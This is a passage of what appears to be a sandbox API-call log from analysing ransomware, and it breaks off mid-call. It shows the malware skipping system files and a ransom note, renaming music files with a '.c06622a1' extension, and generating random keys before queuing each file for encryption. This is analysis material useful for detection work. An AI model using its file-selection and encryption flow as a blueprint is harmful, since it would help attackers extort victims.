ftCreationTime.dwLowDateTime=0xca7870e0, ftCreationTime.dwHighDateTime=0x1d5d9b0, ftLastAccessTime.dwLowDateTime=0x132af020, ftLastAccessTime.dwHighDateTime=0x1d5df4b, ftLastWriteTime.dwLowDateTime=0x132af020, ftLastWriteTime.dwHighDateTime=0x1d5df4b, nFileSizeHigh=0x0, nFileSizeLow=0xb438, dwReserved0=0x0, dwReserved1=0x0, cFileName="o MhkrPjWzQ90.m4a", cAlternateFileName="OMHKRP~1.M4A")) returned 1 [0159.615] _wcsicmp (_Str1="o MhkrPjWzQ90.m4a", _Str2="README.c06622a1.TXT") returned -3 [0159.615] wcsstr (_Str="o MhkrPjWzQ90.m4a", _SubStr="README") returned 0x0 [0159.615] _wcsicmp (_Str1="autorun.inf", _Str2="o MhkrPjWzQ90.m4a") returned -14 [0159.615] wcslen (_String="autorun.inf") returned 0xb [0159.615] _wcsicmp (_Str1="boot.ini", _Str2="o MhkrPjWzQ90.m4a") returned -13 [0159.615] wcslen (_String="boot.ini") returned 0x8 [0159.615] _wcsicmp (_Str1="bootfont.bin", _Str2="o MhkrPjWzQ90.m4a") returned -13 [0159.616] wcslen (_String="bootfont.bin") returned 0xc [0159.616] _wcsicmp (_Str1="bootsect.bak", _Str2="o MhkrPjWzQ90.m4a") returned -13 [0159.616] wcslen (_String="bootsect.bak") returned 0xc [0159.616] _wcsicmp (_Str1="desktop.ini", _Str2="o MhkrPjWzQ90.m4a") returned -11 [0159.616] wcslen (_String="desktop.ini") returned 0xb [0159.616] _wcsicmp (_Str1="iconcache.db", _Str2="o MhkrPjWzQ90.m4a") returned -6 [0159.616] wcslen (_String="iconcache.db") returned 0xc [0159.616] _wcsicmp (_Str1="ntldr", _Str2="o MhkrPjWzQ90.m4a") returned -1 [0159.616] wcslen (_String="ntldr") returned 0x5 [0159.616] _wcsicmp (_Str1="ntuser.dat", _Str2="o MhkrPjWzQ90.m4a") returned -1 [0159.616] wcslen (_String="ntuser.dat") returned 0xa [0159.616] _wcsicmp (_Str1="ntuser.dat.log", _Str2="o MhkrPjWzQ90.m4a") returned -1 [0159.616] wcslen (_String="ntuser.dat.log") returned 0xe [0159.616] _wcsicmp (_Str1="ntuser.ini", _Str2="o MhkrPjWzQ90.m4a") returned -1 [0159.616] wcslen (_String="ntuser.ini") returned 0xa [0159.616] _wcsicmp (_Str1="thumbs.db", _Str2="o MhkrPjWzQ90.m4a") returned 5 [0159.616] wcslen (_String="thumbs.db") returned 0x9 [0159.616] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0159.616] wcslen (_String="386") returned 0x3 [0159.616] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0159.616] wcslen (_String="adv") returned 0x3 [0159.616] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0159.616] wcslen (_String="ani") returned 0x3 [0159.616] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0159.616] wcslen (_String="bat") returned 0x3 [0159.616] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0159.616] wcslen (_String="bin") returned 0x3 [0159.616] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0159.616] wcslen (_String="cab") returned 0x3 [0159.616] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0159.616] wcslen (_String="cmd") returned 0x3 [0159.616] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0159.616] wcslen (_String="com") returned 0x3 [0159.616] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0159.616] wcslen (_String="cpl") returned 0x3 [0159.617] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0159.617] wcslen (_String="cur") returned 0x3 [0159.617] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0159.617] wcslen (_String="deskthemepack") returned 0xd [0159.617] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0159.617] wcslen (_String="diagcab") returned 0x7 [0159.617] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0159.617] wcslen (_String="diagcfg") returned 0x7 [0159.617] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0159.617] wcslen (_String="diagpkg") returned 0x7 [0159.617] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0159.617] wcslen (_String="dll") returned 0x3 [0159.617] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0159.617] wcslen (_String="drv") returned 0x3 [0159.617] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0159.617] wcslen (_String="exe") returned 0x3 [0159.617] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0159.617] wcslen (_String="hlp") returned 0x3 [0159.617] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0159.617] wcslen (_String="icl") returned 0x3 [0159.617] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0159.617] wcslen (_String="icns") returned 0x4 [0159.617] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0159.617] wcslen (_String="ico") returned 0x3 [0159.617] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0159.617] wcslen (_String="ics") returned 0x3 [0159.617] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0159.617] wcslen (_String="idx") returned 0x3 [0159.617] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0159.617] wcslen (_String="ldf") returned 0x3 [0159.617] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0159.617] wcslen (_String="lnk") returned 0x3 [0159.617] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0159.617] wcslen (_String="mod") returned 0x3 [0159.617] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0159.618] wcslen (_String="mpa") returned 0x3 [0159.618] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0159.618] wcslen (_String="msc") returned 0x3 [0159.618] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0159.618] wcslen (_String="msp") returned 0x3 [0159.618] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0159.618] wcslen (_String="msstyles") returned 0x8 [0159.618] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0159.618] wcslen (_String="msu") returned 0x3 [0159.618] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0159.618] wcslen (_String="nls") returned 0x3 [0159.618] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0159.618] wcslen (_String="nomedia") returned 0x7 [0159.618] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0159.618] wcslen (_String="ocx") returned 0x3 [0159.618] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0159.618] wcslen (_String="prf") returned 0x3 [0159.618] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0159.618] wcslen (_String="ps1") returned 0x3 [0159.618] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0159.618] wcslen (_String="rom") returned 0x3 [0159.618] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0159.618] wcslen (_String="rtp") returned 0x3 [0159.618] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0159.618] wcslen (_String="scr") returned 0x3 [0159.618] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0159.618] wcslen (_String="shs") returned 0x3 [0159.618] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0159.618] wcslen (_String="spl") returned 0x3 [0159.618] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0159.618] wcslen (_String="sys") returned 0x3 [0159.618] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0159.618] wcslen (_String="theme") returned 0x5 [0159.618] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0159.618] wcslen (_String="themepack") returned 0x9 [0159.618] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0159.619] wcslen (_String="wpx") returned 0x3 [0159.619] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0159.619] wcslen (_String="lock") returned 0x4 [0159.619] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0159.619] wcslen (_String="key") returned 0x3 [0159.619] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0159.619] wcslen (_String="hta") returned 0x3 [0159.619] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0159.619] wcslen (_String="msi") returned 0x3 [0159.619] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0159.619] wcslen (_String="pdb") returned 0x3 [0159.619] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0159.619] wcslen (_String="sqlite") returned 0x6 [0159.619] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fzik7srs9b")) returned 0x10 [0159.619] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0159.619] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B" [0159.619] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B") returned 0x32 [0159.619] wcscpy (in: _Dest=0x32400c6, _Source="o MhkrPjWzQ90.m4a" | out: _Dest="o MhkrPjWzQ90.m4a") returned="o MhkrPjWzQ90.m4a" [0159.619] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B\\o MhkrPjWzQ90.m4a", dwFileAttributes=0x80) returned 1 [0159.619] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B\\o MhkrPjWzQ90.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fzik7srs9b\\o mhkrpjwzq90.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d0 [0159.619] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.620] ReadFile (in: hFile=0x1d0, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0159.620] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x440dcd6d [0159.620] RtlComputeCrc32 (PartialCrc=0xcd6d, Buffer=0x32e9a4, Length=0x80) returned 0x551a23ab [0159.620] RtlComputeCrc32 (PartialCrc=0x23ab, Buffer=0x32e9a4, Length=0x80) returned 0x5389931e [0159.620] RtlComputeCrc32 (PartialCrc=0x931e, Buffer=0x32e9a4, Length=0x80) returned 0xcd888a01 [0159.620] RtlComputeCrc32 (PartialCrc=0x8a01, Buffer=0x32e9a4, Length=0x80) returned 0xa41c182d [0159.620] CloseHandle (hObject=0x1d0) returned 1 [0159.620] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0159.620] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B\\o MhkrPjWzQ90.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B\\o MhkrPjWzQ90.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B\\o MhkrPjWzQ90.m4a" [0159.621] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B\\o MhkrPjWzQ90.m4a") returned 0x44 [0159.621] wcscpy (in: _Dest=0x32500f0, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.621] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B\\o MhkrPjWzQ90.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fzik7srs9b\\o mhkrpjwzq90.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B\\o MhkrPjWzQ90.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fzik7srs9b\\o mhkrpjwzq90.m4a.c06622a1"), dwFlags=0x8) returned 1 [0159.624] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B\\o MhkrPjWzQ90.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fzik7srs9b\\o mhkrpjwzq90.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1d0 [0159.624] CreateIoCompletionPort (FileHandle=0x1d0, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0159.624] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0159.628] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x719fd5b [0159.628] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x73eba5ed [0159.628] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xfa31fbd [0159.628] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6306c73f [0159.628] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4f6e3471 [0159.628] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3cd7858f [0159.629] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3809b001 [0159.629] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x673b9aca [0159.632] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0x94d70339 [0159.632] RtlComputeCrc32 (PartialCrc=0x339, Buffer=0x710094, Length=0x80) returned 0x56cf3b9c [0159.632] RtlComputeCrc32 (PartialCrc=0x3b9c, Buffer=0x710094, Length=0x80) returned 0x66c753c6 [0159.632] RtlComputeCrc32 (PartialCrc=0x53c6, Buffer=0x710094, Length=0x80) returned 0x947bb0c5 [0159.632] RtlComputeCrc32 (PartialCrc=0xb0c5, Buffer=0x710094, Length=0x80) returned 0x2ac6c0f2 [0159.632] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0159.632] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0159.632] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0159.632] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79932320, ftCreationTime.dwHighDateTime=0x1d5dd91, ftLastAccessTime.dwLowDateTime=0x81bf1c30, ftLastAccessTime.dwHighDateTime=0x1d5d8ea, ftLastWriteTime.dwLowDateTime=0x81bf1c30, ftLastWriteTime.dwHighDateTime=0x1d5d8ea, nFileSizeHigh=0x0, nFileSizeLow=0x7174, dwReserved0=0x0, dwReserved1=0x0, cFileName="qAyaBv.wav", cAlternateFileName="")) returned 1 [0159.632] _wcsicmp (_Str1="qAyaBv.wav", _Str2="README.c06622a1.TXT") returned -1 [0159.632] wcsstr (_Str="qAyaBv.wav", _SubStr="README") returned 0x0 [0159.632] _wcsicmp (_Str1="autorun.inf", _Str2="qAyaBv.wav") returned -16 [0159.632] wcslen (_String="autorun.inf") returned 0xb [0159.632] _wcsicmp (_Str1="boot.ini", _Str2="qAyaBv.wav") returned -15 [0159.632] wcslen (_String="boot.ini") returned 0x8 [0159.632] _wcsicmp (_Str1="bootfont.bin", _Str2="qAyaBv.wav") returned -15 [0159.632] wcslen (_String="bootfont.bin") returned 0xc [0159.632] _wcsicmp (_Str1="bootsect.bak", _Str2="qAyaBv.wav") returned -15 [0159.632] wcslen (_String="bootsect.bak") returned 0xc [0159.632] _wcsicmp (_Str1="desktop.ini", _Str2="qAyaBv.wav") returned -13 [0159.632] wcslen (_String="desktop.ini") returned 0xb [0159.632] _wcsicmp (_Str1="iconcache.db", _Str2="qAyaBv.wav") returned -8 [0159.632] wcslen (_String="iconcache.db") returned 0xc [0159.632] _wcsicmp (_Str1="ntldr", _Str2="qAyaBv.wav") returned -3 [0159.632] wcslen (_String="ntldr") returned 0x5 [0159.632] _wcsicmp (_Str1="ntuser.dat", _Str2="qAyaBv.wav") returned -3 [0159.632] wcslen (_String="ntuser.dat") returned 0xa [0159.633] _wcsicmp (_Str1="ntuser.dat.log", _Str2="qAyaBv.wav") returned -3 [0159.633] wcslen (_String="ntuser.dat.log") returned 0xe [0159.633] _wcsicmp (_Str1="ntuser.ini", _Str2="qAyaBv.wav") returned -3 [0159.633] wcslen (_String="ntuser.ini") returned 0xa [0159.633] _wcsicmp (_Str1="thumbs.db", _Str2="qAyaBv.wav") returned 3 [0159.633] wcslen (_String="thumbs.db") returned 0x9 [0159.633] _wcsicmp (_Str1="386", _Str2="wav") returned -68 [0159.633] wcslen (_String="386") returned 0x3 [0159.633] _wcsicmp (_Str1="adv", _Str2="wav") returned -22 [0159.633] wcslen (_String="adv") returned 0x3 [0159.633] _wcsicmp (_Str1="ani", _Str2="wav") returned -22 [0159.633] wcslen (_String="ani") returned 0x3 [0159.633] _wcsicmp (_Str1="bat", _Str2="wav") returned -21 [0159.633] wcslen (_String="bat") returned 0x3 [0159.633] _wcsicmp (_Str1="bin", _Str2="wav") returned -21 [0159.633] wcslen (_String="bin") returned 0x3 [0159.633] _wcsicmp (_Str1="cab", _Str2="wav") returned -20 [0159.633] wcslen (_String="cab") returned 0x3 [0159.633] _wcsicmp (_Str1="cmd", _Str2="wav") returned -20 [0159.633] wcslen (_String="cmd") returned 0x3 [0159.633] _wcsicmp (_Str1="com", _Str2="wav") returned -20 [0159.633] wcslen (_String="com") returned 0x3 [0159.633] _wcsicmp (_Str1="cpl", _Str2="wav") returned -20 [0159.633] wcslen (_String="cpl") returned 0x3 [0159.633] _wcsicmp (_Str1="cur", _Str2="wav") returned -20 [0159.633] wcslen (_String="cur") returned 0x3 [0159.633] _wcsicmp (_Str1="deskthemepack", _Str2="wav") returned -19 [0159.633] wcslen (_String="deskthemepack") returned 0xd [0159.633] _wcsicmp (_Str1="diagcab", _Str2="wav") returned -19 [0159.633] wcslen (_String="diagcab") returned 0x7 [0159.633] _wcsicmp (_Str1="diagcfg", _Str2="wav") returned -19 [0159.633] wcslen (_String="diagcfg") returned 0x7 [0159.633] _wcsicmp (_Str1="diagpkg", _Str2="wav") returned -19 [0159.633] wcslen (_String="diagpkg") returned 0x7 [0159.634] _wcsicmp (_Str1="dll", _Str2="wav") returned -19 [0159.634] wcslen (_String="dll") returned 0x3 [0159.634] _wcsicmp (_Str1="drv", _Str2="wav") returned -19 [0159.634] wcslen (_String="drv") returned 0x3 [0159.634] _wcsicmp (_Str1="exe", _Str2="wav") returned -18 [0159.634] wcslen (_String="exe") returned 0x3 [0159.634] _wcsicmp (_Str1="hlp", _Str2="wav") returned -15 [0159.634] wcslen (_String="hlp") returned 0x3 [0159.634] _wcsicmp (_Str1="icl", _Str2="wav") returned -14 [0159.634] wcslen (_String="icl") returned 0x3 [0159.634] _wcsicmp (_Str1="icns", _Str2="wav") returned -14 [0159.634] wcslen (_String="icns") returned 0x4 [0159.634] _wcsicmp (_Str1="ico", _Str2="wav") returned -14 [0159.634] wcslen (_String="ico") returned 0x3 [0159.634] _wcsicmp (_Str1="ics", _Str2="wav") returned -14 [0159.634] wcslen (_String="ics") returned 0x3 [0159.634] _wcsicmp (_Str1="idx", _Str2="wav") returned -14 [0159.634] wcslen (_String="idx") returned 0x3 [0159.634] _wcsicmp (_Str1="ldf", _Str2="wav") returned -11 [0159.634] wcslen (_String="ldf") returned 0x3 [0159.634] _wcsicmp (_Str1="lnk", _Str2="wav") returned -11 [0159.634] wcslen (_String="lnk") returned 0x3 [0159.634] _wcsicmp (_Str1="mod", _Str2="wav") returned -10 [0159.634] wcslen (_String="mod") returned 0x3 [0159.634] _wcsicmp (_Str1="mpa", _Str2="wav") returned -10 [0159.634] wcslen (_String="mpa") returned 0x3 [0159.634] _wcsicmp (_Str1="msc", _Str2="wav") returned -10 [0159.634] wcslen (_String="msc") returned 0x3 [0159.634] _wcsicmp (_Str1="msp", _Str2="wav") returned -10 [0159.634] wcslen (_String="msp") returned 0x3 [0159.634] _wcsicmp (_Str1="msstyles", _Str2="wav") returned -10 [0159.634] wcslen (_String="msstyles") returned 0x8 [0159.634] _wcsicmp (_Str1="msu", _Str2="wav") returned -10 [0159.634] wcslen (_String="msu") returned 0x3 [0159.634] _wcsicmp (_Str1="nls", _Str2="wav") returned -9 [0159.634] wcslen (_String="nls") returned 0x3 [0159.635] _wcsicmp (_Str1="nomedia", _Str2="wav") returned -9 [0159.635] wcslen (_String="nomedia") returned 0x7 [0159.635] _wcsicmp (_Str1="ocx", _Str2="wav") returned -8 [0159.635] wcslen (_String="ocx") returned 0x3 [0159.635] _wcsicmp (_Str1="prf", _Str2="wav") returned -7 [0159.635] wcslen (_String="prf") returned 0x3 [0159.635] _wcsicmp (_Str1="ps1", _Str2="wav") returned -7 [0159.635] wcslen (_String="ps1") returned 0x3 [0159.635] _wcsicmp (_Str1="rom", _Str2="wav") returned -5 [0159.635] wcslen (_String="rom") returned 0x3 [0159.635] _wcsicmp (_Str1="rtp", _Str2="wav") returned -5 [0159.635] wcslen (_String="rtp") returned 0x3 [0159.635] _wcsicmp (_Str1="scr", _Str2="wav") returned -4 [0159.635] wcslen (_String="scr") returned 0x3 [0159.635] _wcsicmp (_Str1="shs", _Str2="wav") returned -4 [0159.635] wcslen (_String="shs") returned 0x3 [0159.635] _wcsicmp (_Str1="spl", _Str2="wav") returned -4 [0159.635] wcslen (_String="spl") returned 0x3 [0159.635] _wcsicmp (_Str1="sys", _Str2="wav") returned -4 [0159.635] wcslen (_String="sys") returned 0x3 [0159.635] _wcsicmp (_Str1="theme", _Str2="wav") returned -3 [0159.635] wcslen (_String="theme") returned 0x5 [0159.635] _wcsicmp (_Str1="themepack", _Str2="wav") returned -3 [0159.635] wcslen (_String="themepack") returned 0x9 [0159.635] _wcsicmp (_Str1="wpx", _Str2="wav") returned 15 [0159.635] wcslen (_String="wpx") returned 0x3 [0159.635] _wcsicmp (_Str1="lock", _Str2="wav") returned -11 [0159.635] wcslen (_String="lock") returned 0x4 [0159.635] _wcsicmp (_Str1="key", _Str2="wav") returned -12 [0159.635] wcslen (_String="key") returned 0x3 [0159.635] _wcsicmp (_Str1="hta", _Str2="wav") returned -15 [0159.635] wcslen (_String="hta") returned 0x3 [0159.635] _wcsicmp (_Str1="msi", _Str2="wav") returned -10 [0159.635] wcslen (_String="msi") returned 0x3 [0159.636] _wcsicmp (_Str1="pdb", _Str2="wav") returned -7 [0159.636] wcslen (_String="pdb") returned 0x3 [0159.636] _wcsicmp (_Str1="sqlite", _Str2="wav") returned -4 [0159.636] wcslen (_String="sqlite") returned 0x6 [0159.636] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fzik7srs9b")) returned 0x10 [0159.636] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0159.636] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B" [0159.636] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B") returned 0x32 [0159.636] wcscpy (in: _Dest=0x32400c6, _Source="qAyaBv.wav" | out: _Dest="qAyaBv.wav") returned="qAyaBv.wav" [0159.636] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B\\qAyaBv.wav", dwFileAttributes=0x80) returned 1 [0159.636] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B\\qAyaBv.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fzik7srs9b\\qayabv.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0159.636] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.636] ReadFile (in: hFile=0x1bc, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0159.637] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x1417da54 [0159.637] RtlComputeCrc32 (PartialCrc=0xda54, Buffer=0x32e9a4, Length=0x80) returned 0x30c59604 [0159.637] RtlComputeCrc32 (PartialCrc=0x9604, Buffer=0x32e9a4, Length=0x80) returned 0x492cf819 [0159.637] RtlComputeCrc32 (PartialCrc=0xf819, Buffer=0x32e9a4, Length=0x80) returned 0xbf53eefe [0159.637] RtlComputeCrc32 (PartialCrc=0xeefe, Buffer=0x32e9a4, Length=0x80) returned 0xc24c4769 [0159.637] CloseHandle (hObject=0x1bc) returned 1 [0159.637] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0159.637] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B\\qAyaBv.wav" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B\\qAyaBv.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B\\qAyaBv.wav" [0159.637] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B\\qAyaBv.wav") returned 0x3d [0159.637] wcscpy (in: _Dest=0x32500e2, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.637] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B\\qAyaBv.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fzik7srs9b\\qayabv.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B\\qAyaBv.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fzik7srs9b\\qayabv.wav.c06622a1"), dwFlags=0x8) returned 1 [0159.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\fZIk7sRS9B\\qAyaBv.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\fzik7srs9b\\qayabv.wav.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1bc [0159.640] CreateIoCompletionPort (FileHandle=0x1bc, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0159.640] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2690020 [0159.647] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7913a85a [0159.647] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2be5cf79 [0159.647] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6b9cfa6f [0159.647] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x265a6f0f [0159.647] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4b57c65e [0159.647] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 